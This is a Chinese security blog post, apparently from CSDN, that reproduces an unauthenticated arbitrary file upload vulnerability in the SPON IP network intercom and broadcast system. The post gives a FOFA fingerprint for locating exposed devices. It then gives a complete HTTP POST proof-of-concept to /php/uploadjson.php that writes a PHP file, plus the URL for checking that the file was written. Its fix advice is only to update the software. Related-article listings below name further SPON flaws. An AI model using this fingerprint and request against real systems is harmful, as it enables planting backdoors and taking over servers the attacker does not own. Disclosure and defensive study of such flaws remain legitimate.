世邦IP网络对讲广播系统 uploadjson.php接口处存在任意文件上传漏洞

最新推荐文章于 2024-07-27 14:51:42 发布
最新推荐文章于 2024-07-27 14:51:42 发布
阅读量851 收藏 11
点赞数 13
分类专栏: 漏洞复现 文章标签: 网络 tcp/ip php web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/135504061
版权

产品简介

SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。

漏洞概述

SPON世邦IP网络对讲广播系统 uploadjson.php接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用此漏洞上传恶意后门文件,可导致服务器失陷。

指纹识别

fofa:

icon_hash="-1830859634"

漏洞利用

poc

POST /php/uploadjson.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
 
jsondata[filename]=2.php&jsondata[data]=<?php echo md5('123456');?>

在这里插入图片描述
验证url:

http://your_ip/lan/2.php

在这里插入图片描述

修复建议

联系软件厂商更新至最新安全版本

3tefanie丶zhou
关注
  • 13
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SPON世邦 IP网络广播系统文件漏洞复现
0xSec
01-08 1633
SPON世邦IP网络广播系统addscenedata.phpuploadjson.php、my_parser.php接口存在任意文件漏洞,未经身份验证的攻击者可利用此漏洞恶意后门文件,可导致服务器失陷。
漏洞复现】SPON世邦-IP网络广播系统-uploadjson-文件
知黑而守白
01-27 100
SPON世邦IP网络广播系统是一种先进的通信解决方案,旨在提供高效的网络广播功能。SPON世邦IP网络广播系统 uploadjson 接口存在文件漏洞。未经身份认证的攻击者通过该漏洞恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
世邦通信 SPON IP网络广播系统uploadjson.php任意文件漏洞
Keepb1ue的博客
01-10 2153
世邦通信SPON IP网络广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行送,是一套纯数字系统
世邦 IP网络广播系统 ping.php接口存在远程命令执行漏洞
3tefanie丶zhou的博客
01-10 1293
SPON世邦IP网络广播系统是一种先进的通信解决方案,旨在提供高效的网络广播功能。SPON世邦IP网络广播系统ping.php接口存在远程命令执行漏洞,未经身份验证的攻击者可利用此漏洞执行高危命令获取服务器权限。
世邦spon IP网络广播系统任意文件漏洞
Keepb1ue的博客
01-09 2307
世邦通信 IP网络广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行送,是一套纯数字系统
世邦IP网络广播系统演示.ppt
09-28
世邦IP网络广播系统】是由世邦通用数字技术有限公司研发的一款基于IP网络技术的公共广播系统,该公司作为大中华区领先的IP网络公共广播系统提供商,隶属于世邦电子集团,拥有分布在加拿大、中国大陆多个城市的分支...
世邦IP网络公共广播交流培训.pptx
10-12
世邦IP网络公共广播系统详解》 世邦IP网络公共广播系统,是现代音频播技术的杰出代表,它利用先进的数字技术,将音频信号转化为数据包,在局域网和广域网上进行高效输,构建了一种全新的双向音频扩声系统。这...
世邦IP配置工具.rar
01-15
世邦IP配置工具》是一款专为IP系统设计的专业配置软件,它集成了丰富的功能,便于用户管理和优化网络设备。在现代通信技术中,IP系统已经成为安全监控、楼宇管理等领域不可或缺的一部分。通过IP...
IP网络(世邦)开发SDK文档Demo及dll&ocx;
11-20
IP网络技术详解——基于世邦SDK的开发实践》 在当今信息化社会中,IP网络系统因其高效、稳定和灵活的特点,被广泛应用于监控、安防、指挥调度等多个领域。本文将深入探讨IP网络的核心技术,并以世邦...
世邦IP网络公共广播交流培训剖析.ppt
12-17
世邦IP网络公共广播交流培训剖析.ppt
使用富文本编辑器插件实现上图片功能
weixin_43900374的博客
12-15 1702
1.安装 富文本编辑器地址这是文档地址,进去可以看到如下的页面 演示,下载,文档功能都有 进去下载 下载并解压完成后的目录 把这些文件都放在你需要使用的项目下面,asp,asp.net,jsp,php这些是服务端程序,因为你得结合自己的服务端,所以这些可以不要 可以在自己的项目下面新建一个目录 editor 比如我的方式 2.使用(你也可以看文档使用) 在需要使用的html页面添加如下代码 <head> <style> ...
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 246
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
网络编程套接字socket
安权_code的博客
07-23 954
网络编程中的套接字(socket)是实现网络通信的关键,换句话来说,套接字像两个端点,而发送方与接收方就是通过这两个端点进行通信的,socket的意思是插座,表示插头和插座连接上后,即发送方和接收方连接上了,然后把电流通过插座流向插头对标发送方与接收方建立了链接。
S5730举例
最新发布
jjjxxxhhh123的博客
07-27 625
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络输组播数据包,减少网络带宽的占用,提高数据输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
使用WebSocket协议调用群发方法将消息返回客户端页面
2302_79840586的博客
07-27 834
使用WebSocket协议调用群发方法将消息返回客户端页面
DNS域名管理系统、搭建DNS服务
十四的博客
07-23 932
DNS概述。
H3C与VPN高级应用(七)深入探讨H3C防火墙与VPN高级应用
洛秋的博客
07-23 1115
IPSec(Internet Protocol Security)是一种用于保护IP通信的协议,通过对数据包进行加密和认证来确保数据的机密性、完整性和真实性。IPSec VPN通常用于建立安全的远程连接,保护企业内部网络与远程办公或分支机构之间的数据通信。NAT(Network Address Translation)是一种将私有IP地址转换为公共IP地址的技术,通常用于多个设备共享一个公共IP地址访问互联网。NAT有助于节约公共IP地址,同时增强内部网络的安全性。
【计算机网络】OSPF单区域实验
m0_65787507的博客
07-26 759
DR和BDR是由同一网段中所有的路由器根据路由优先级和Router ID通过Hello报文选举出来的,只有优先级大于0的路由器才具有选举资格。进行DR/BDR选举时每台路由器将自己选出的DR写入Hello报文中,发给网段上的每台运行OSPF协议的路由器。如果DR或BDR失效,或者有新的路由器加入网络并希望成为DR或BDR,那么它们将参与新的选举过程。4:非DR路由器将自己的LSA发送给DR,然后DR将这些LSA泛洪到整个区域,使所有路由器获得一致的LSDB,从而确保区域内路由器都能计算出相同的最短路径树。
通信原理-思科实验五:家庭终端以太网接入Internet实验
sinat_39522506的博客
07-24 340
实验五 家庭终端以太网接入Internet实验。接着配置IP地址池和虚拟模板 开启宽带拨号。1.按照上图选择对应的设备,并连接起来。5.为路由器R1配置静态路由项。7.完成终端PC2 IP配置。
世邦IP网络内部通信系统-高效银行对解决方案
"IP网络内部通信系统-对方案,主要应用于自助银行和金库,由世邦通信技术有限公司提供,包含多种IP网络终端和核心设备,旨在解决统对系统的局限性,实现远程、清晰且可靠的内部通信。" IP网络内部通信...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值